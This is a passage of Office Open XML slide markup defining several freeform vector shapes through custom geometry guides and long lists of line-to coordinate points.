                      <a:pt x="670" y="624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="641" y="633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="637"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="623" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="595" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="622"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="617"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="432" y="609"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="586"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="579"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="575"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="571"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="563"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="558"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="548"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="322"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="327"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="424" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="469" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="492" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="527" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="534" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="543" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="560" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="610" y="302"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="659" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="676" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="2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090" name="Freeform 96"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="489" y="2493"/>
                <a:ext cx="34" cy="21"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 105"/>
                  <a:gd name="T1" fmla="*/ 0 h 61"/>
                  <a:gd name="T2" fmla="*/ 0 w 105"/>
                  <a:gd name="T3" fmla="*/ 0 h 61"/>
                  <a:gd name="T4" fmla="*/ 0 w 105"/>
                  <a:gd name="T5" fmla="*/ 0 h 61"/>
                  <a:gd name="T6" fmla="*/ 0 w 105"/>
                  <a:gd name="T7" fmla="*/ 0 h 61"/>
                  <a:gd name="T8" fmla="*/ 0 w 105"/>
                  <a:gd name="T9" fmla="*/ 0 h 61"/>
                  <a:gd name="T10" fmla="*/ 0 w 105"/>
                  <a:gd name="T11" fmla="*/ 0 h 61"/>
                  <a:gd name="T12" fmla="*/ 0 w 105"/>
                  <a:gd name="T13" fmla="*/ 0 h 61"/>
                  <a:gd name="T14" fmla="*/ 0 w 105"/>
                  <a:gd name="T15" fmla="*/ 0 h 61"/>
                  <a:gd name="T16" fmla="*/ 0 w 105"/>
                  <a:gd name="T17" fmla="*/ 0 h 61"/>
                  <a:gd name="T18" fmla="*/ 0 w 105"/>
                  <a:gd name="T19" fmla="*/ 0 h 61"/>
                  <a:gd name="T20" fmla="*/ 0 w 105"/>
                  <a:gd name="T21" fmla="*/ 0 h 61"/>
                  <a:gd name="T22" fmla="*/ 0 w 105"/>
                  <a:gd name="T23" fmla="*/ 0 h 61"/>
                  <a:gd name="T24" fmla="*/ 0 w 105"/>
                  <a:gd name="T25" fmla="*/ 0 h 61"/>
                  <a:gd name="T26" fmla="*/ 0 w 105"/>
                  <a:gd name="T27" fmla="*/ 0 h 61"/>
                  <a:gd name="T28" fmla="*/ 0 w 105"/>
                  <a:gd name="T29" fmla="*/ 0 h 61"/>
                  <a:gd name="T30" fmla="*/ 0 w 105"/>
                  <a:gd name="T31" fmla="*/ 0 h 61"/>
                  <a:gd name="T32" fmla="*/ 0 w 105"/>
                  <a:gd name="T33" fmla="*/ 0 h 61"/>
                  <a:gd name="T34" fmla="*/ 0 w 105"/>
                  <a:gd name="T35" fmla="*/ 0 h 61"/>
                  <a:gd name="T36" fmla="*/ 0 w 105"/>
                  <a:gd name="T37" fmla="*/ 0 h 61"/>
                  <a:gd name="T38" fmla="*/ 0 w 105"/>
                  <a:gd name="T39" fmla="*/ 0 h 61"/>
                  <a:gd name="T40" fmla="*/ 0 w 105"/>
                  <a:gd name="T41" fmla="*/ 0 h 61"/>
                  <a:gd name="T42" fmla="*/ 0 w 105"/>
                  <a:gd name="T43" fmla="*/ 0 h 61"/>
                  <a:gd name="T44" fmla="*/ 0 w 105"/>
                  <a:gd name="T45" fmla="*/ 0 h 61"/>
                  <a:gd name="T46" fmla="*/ 0 w 105"/>
                  <a:gd name="T47" fmla="*/ 0 h 61"/>
                  <a:gd name="T48" fmla="*/ 0 w 105"/>
                  <a:gd name="T49" fmla="*/ 0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5"/>
                  <a:gd name="T76" fmla="*/ 0 h 61"/>
                  <a:gd name="T77" fmla="*/ 105 w 105"/>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5" h="61">
                    <a:moveTo>
                      <a:pt x="1" y="55"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="55"/>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091" name="Freeform 97"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="523" y="2483"/>
                <a:ext cx="10" cy="12"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 33"/>
                  <a:gd name="T1" fmla="*/ 0 h 37"/>
                  <a:gd name="T2" fmla="*/ 0 w 33"/>
                  <a:gd name="T3" fmla="*/ 0 h 37"/>
                  <a:gd name="T4" fmla="*/ 0 w 33"/>
                  <a:gd name="T5" fmla="*/ 0 h 37"/>
                  <a:gd name="T6" fmla="*/ 0 w 33"/>
                  <a:gd name="T7" fmla="*/ 0 h 37"/>
                  <a:gd name="T8" fmla="*/ 0 w 33"/>
                  <a:gd name="T9" fmla="*/ 0 h 37"/>
                  <a:gd name="T10" fmla="*/ 0 w 33"/>
                  <a:gd name="T11" fmla="*/ 0 h 37"/>
                  <a:gd name="T12" fmla="*/ 0 w 33"/>
                  <a:gd name="T13" fmla="*/ 0 h 37"/>
                  <a:gd name="T14" fmla="*/ 0 w 33"/>
                  <a:gd name="T15" fmla="*/ 0 h 37"/>
                  <a:gd name="T16" fmla="*/ 0 w 33"/>
                  <a:gd name="T17" fmla="*/ 0 h 37"/>
                  <a:gd name="T18" fmla="*/ 0 w 33"/>
                  <a:gd name="T19" fmla="*/ 0 h 37"/>
                  <a:gd name="T20" fmla="*/ 0 w 33"/>
                  <a:gd name="T21" fmla="*/ 0 h 37"/>
                  <a:gd name="T22" fmla="*/ 0 w 33"/>
                  <a:gd name="T23" fmla="*/ 0 h 37"/>
                  <a:gd name="T24" fmla="*/ 0 w 33"/>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37"/>
                  <a:gd name="T41" fmla="*/ 33 w 33"/>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37">
                    <a:moveTo>
                      <a:pt x="0" y="28"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>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092" name="Freeform 98"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="566" y="2421"/>
                <a:ext cx="38" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 115"/>
                  <a:gd name="T1" fmla="*/ 0 h 115"/>
                  <a:gd name="T2" fmla="*/ 0 w 115"/>
                  <a:gd name="T3" fmla="*/ 0 h 115"/>
                  <a:gd name="T4" fmla="*/ 0 w 115"/>
                  <a:gd name="T5" fmla="*/ 0 h 115"/>
                  <a:gd name="T6" fmla="*/ 0 w 115"/>
                  <a:gd name="T7" fmla="*/ 0 h 115"/>
                  <a:gd name="T8" fmla="*/ 0 w 115"/>
                  <a:gd name="T9" fmla="*/ 0 h 115"/>
                  <a:gd name="T10" fmla="*/ 0 w 115"/>
                  <a:gd name="T11" fmla="*/ 0 h 115"/>
                  <a:gd name="T12" fmla="*/ 0 w 115"/>
                  <a:gd name="T13" fmla="*/ 0 h 115"/>
                  <a:gd name="T14" fmla="*/ 0 w 115"/>
                  <a:gd name="T15" fmla="*/ 0 h 115"/>
                  <a:gd name="T16" fmla="*/ 0 w 115"/>
                  <a:gd name="T17" fmla="*/ 0 h 115"/>
                  <a:gd name="T18" fmla="*/ 0 w 115"/>
                  <a:gd name="T19" fmla="*/ 0 h 115"/>
                  <a:gd name="T20" fmla="*/ 0 w 115"/>
                  <a:gd name="T21" fmla="*/ 0 h 115"/>
                  <a:gd name="T22" fmla="*/ 0 w 115"/>
                  <a:gd name="T23" fmla="*/ 0 h 115"/>
                  <a:gd name="T24" fmla="*/ 0 w 115"/>
                  <a:gd name="T25" fmla="*/ 0 h 115"/>
                  <a:gd name="T26" fmla="*/ 0 w 115"/>
                  <a:gd name="T27" fmla="*/ 0 h 115"/>
                  <a:gd name="T28" fmla="*/ 0 w 115"/>
                  <a:gd name="T29" fmla="*/ 0 h 115"/>
                  <a:gd name="T30" fmla="*/ 0 w 115"/>
                  <a:gd name="T31" fmla="*/ 0 h 115"/>
                  <a:gd name="T32" fmla="*/ 0 w 115"/>
                  <a:gd name="T33" fmla="*/ 0 h 115"/>
                  <a:gd name="T34" fmla="*/ 0 w 115"/>
                  <a:gd name="T35" fmla="*/ 0 h 115"/>
                  <a:gd name="T36" fmla="*/ 0 w 115"/>
                  <a:gd name="T37" fmla="*/ 0 h 115"/>
                  <a:gd name="T38" fmla="*/ 0 w 115"/>
                  <a:gd name="T39" fmla="*/ 0 h 115"/>
                  <a:gd name="T40" fmla="*/ 0 w 115"/>
                  <a:gd name="T41" fmla="*/ 0 h 115"/>
                  <a:gd name="T42" fmla="*/ 0 w 115"/>
                  <a:gd name="T43" fmla="*/ 0 h 115"/>
                  <a:gd name="T44" fmla="*/ 0 w 115"/>
                  <a:gd name="T45" fmla="*/ 0 h 115"/>
                  <a:gd name="T46" fmla="*/ 0 w 115"/>
                  <a:gd name="T47" fmla="*/ 0 h 115"/>
                  <a:gd name="T48" fmla="*/ 0 w 115"/>
                  <a:gd name="T49" fmla="*/ 0 h 115"/>
                  <a:gd name="T50" fmla="*/ 0 w 115"/>
                  <a:gd name="T51" fmla="*/ 0 h 115"/>
                  <a:gd name="T52" fmla="*/ 0 w 115"/>
                  <a:gd name="T53" fmla="*/ 0 h 115"/>
                  <a:gd name="T54" fmla="*/ 0 w 115"/>
                  <a:gd name="T55" fmla="*/ 0 h 115"/>
                  <a:gd name="T56" fmla="*/ 0 w 115"/>
                  <a:gd name="T57" fmla="*/ 0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
                  <a:gd name="T88" fmla="*/ 0 h 115"/>
                  <a:gd name="T89" fmla="*/ 115 w 11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 h="115">
                    <a:moveTo>
                      <a:pt x="0" y="110"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11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093" name="Freeform 99"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="609" y="2378"/>
                <a:ext cx="73" cy="34"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 224"/>
                  <a:gd name="T1" fmla="*/ 0 h 102"/>
                  <a:gd name="T2" fmla="*/ 0 w 224"/>
                  <a:gd name="T3" fmla="*/ 0 h 102"/>
                  <a:gd name="T4" fmla="*/ 0 w 224"/>
                  <a:gd name="T5" fmla="*/ 0 h 102"/>
                  <a:gd name="T6" fmla="*/ 0 w 224"/>
                  <a:gd name="T7" fmla="*/ 0 h 102"/>
                  <a:gd name="T8" fmla="*/ 0 w 224"/>
                  <a:gd name="T9" fmla="*/ 0 h 102"/>
                  <a:gd name="T10" fmla="*/ 0 w 224"/>
                  <a:gd name="T11" fmla="*/ 0 h 102"/>
                  <a:gd name="T12" fmla="*/ 0 w 224"/>
                  <a:gd name="T13" fmla="*/ 0 h 102"/>
                  <a:gd name="T14" fmla="*/ 0 w 224"/>
                  <a:gd name="T15" fmla="*/ 0 h 102"/>
                  <a:gd name="T16" fmla="*/ 0 w 224"/>
                  <a:gd name="T17" fmla="*/ 0 h 102"/>
                  <a:gd name="T18" fmla="*/ 0 w 224"/>
                  <a:gd name="T19" fmla="*/ 0 h 102"/>
                  <a:gd name="T20" fmla="*/ 0 w 224"/>
                  <a:gd name="T21" fmla="*/ 0 h 102"/>
                  <a:gd name="T22" fmla="*/ 0 w 224"/>
                  <a:gd name="T23" fmla="*/ 0 h 102"/>
                  <a:gd name="T24" fmla="*/ 0 w 224"/>
                  <a:gd name="T25" fmla="*/ 0 h 102"/>
                  <a:gd name="T26" fmla="*/ 0 w 224"/>
                  <a:gd name="T27" fmla="*/ 0 h 102"/>
                  <a:gd name="T28" fmla="*/ 0 w 224"/>
                  <a:gd name="T29" fmla="*/ 0 h 102"/>
                  <a:gd name="T30" fmla="*/ 0 w 224"/>
                  <a:gd name="T31" fmla="*/ 0 h 102"/>
                  <a:gd name="T32" fmla="*/ 0 w 224"/>
                  <a:gd name="T33" fmla="*/ 0 h 102"/>
                  <a:gd name="T34" fmla="*/ 0 w 224"/>
                  <a:gd name="T35" fmla="*/ 0 h 102"/>
                  <a:gd name="T36" fmla="*/ 0 w 224"/>
                  <a:gd name="T37" fmla="*/ 0 h 102"/>
                  <a:gd name="T38" fmla="*/ 0 w 224"/>
                  <a:gd name="T39" fmla="*/ 0 h 102"/>
                  <a:gd name="T40" fmla="*/ 0 w 224"/>
                  <a:gd name="T41" fmla="*/ 0 h 102"/>
                  <a:gd name="T42" fmla="*/ 0 w 224"/>
                  <a:gd name="T43" fmla="*/ 0 h 102"/>
                  <a:gd name="T44" fmla="*/ 0 w 224"/>
                  <a:gd name="T45" fmla="*/ 0 h 102"/>
                  <a:gd name="T46" fmla="*/ 0 w 224"/>
                  <a:gd name="T47" fmla="*/ 0 h 102"/>
                  <a:gd name="T48" fmla="*/ 0 w 224"/>
                  <a:gd name="T49" fmla="*/ 0 h 102"/>
                  <a:gd name="T50" fmla="*/ 0 w 224"/>
                  <a:gd name="T51" fmla="*/ 0 h 102"/>
                  <a:gd name="T52" fmla="*/ 0 w 224"/>
                  <a:gd name="T53" fmla="*/ 0 h 102"/>
                  <a:gd name="T54" fmla="*/ 0 w 224"/>
                  <a:gd name="T55" fmla="*/ 0 h 102"/>
                  <a:gd name="T56" fmla="*/ 0 w 224"/>
                  <a:gd name="T57" fmla="*/ 0 h 102"/>
                  <a:gd name="T58" fmla="*/ 0 w 224"/>
                  <a:gd name="T59" fmla="*/ 0 h 102"/>
                  <a:gd name="T60" fmla="*/ 0 w 224"/>
                  <a:gd name="T61" fmla="*/ 0 h 102"/>
                  <a:gd name="T62" fmla="*/ 0 w 224"/>
                  <a:gd name="T63" fmla="*/ 0 h 102"/>
                  <a:gd name="T64" fmla="*/ 0 w 224"/>
                  <a:gd name="T65" fmla="*/ 0 h 102"/>
                  <a:gd name="T66" fmla="*/ 0 w 224"/>
                  <a:gd name="T67" fmla="*/ 0 h 102"/>
                  <a:gd name="T68" fmla="*/ 0 w 224"/>
                  <a:gd name="T69" fmla="*/ 0 h 102"/>
                  <a:gd name="T70" fmla="*/ 0 w 224"/>
                  <a:gd name="T71" fmla="*/ 0 h 102"/>
                  <a:gd name="T72" fmla="*/ 0 w 224"/>
                  <a:gd name="T73" fmla="*/ 0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4"/>
                  <a:gd name="T112" fmla="*/ 0 h 102"/>
                  <a:gd name="T113" fmla="*/ 224 w 224"/>
                  <a:gd name="T114" fmla="*/ 102 h 10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4" h="102">
                    <a:moveTo>
                      <a:pt x="0" y="102"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="87"/>
